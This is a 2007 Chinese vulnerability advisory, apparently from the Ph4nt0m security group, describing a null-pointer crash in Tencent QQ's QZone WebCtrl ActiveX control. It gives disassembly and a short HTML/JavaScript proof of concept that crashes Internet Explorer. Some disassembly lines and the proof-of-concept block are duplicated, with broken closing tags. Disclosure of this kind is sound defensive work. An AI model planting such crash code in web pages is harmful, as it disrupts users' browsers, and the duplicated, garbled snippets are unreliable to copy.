[Advisory]Tencent QQ QQzone WebCtrl Activex空指针引用漏洞(0day)
by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org
Date: 2007-02-13
摘要:
QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。幻影旅团的axis发现了一个QQZone的activex漏洞。在使用WebCtrl
方法时,将引用一个空指针,造成ie崩溃。由于该activex没有标记为safe,故会出现安全提示。
影响版本:
Tencent QQ2006/2007及之前所有版本。
细节:
在\Tencent\QQ\QZone\TWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用
051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
051024C8 6A 00 PUSH 0
051024CA 6A 00 PUSH 0
051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
051024D2 6A 00 PUSH 0
051024D4 6A 00 PUSH 0
051024D6 52 PUSH EDX
051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]
051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
051024C8 6A 00 PUSH 0
051024CA 6A 00 PUSH 0
051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
051024D2 6A 00 PUSH 0
051024D4 6A 00 PUSH 0
051024D6 52 PUSH EDX
051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]
此时EAX为null
幻影旅团将对此发布一个POC代码,请勿将此作为非法用途
POC:
<html>
<script>
var fuckqq = new ActiveXObject("WebCtrl.TWebControl.1");
var arg1 = 0;
fuckqq.Navigate(arg1);
script>
html>
<script>
var fuckqq = new ActiveXObject("WebCtrl.TWebControl.1");
var arg1 = 0;
fuckqq.Navigate(arg1);
script>
html>
建议:
禁止ie执行activex
厂商补丁:
目前厂商没有发布补丁
http://www.qq.com
关于Ph4nt0m:
Ph4nt0m是国内的一个安全组织,由一群来自五湖四海的朋友,因为共同热爱网络安全而走到一起来。
欢迎访问我们的网站http://www.ph4nt0m.org
--EOF--
没有评论:
发表评论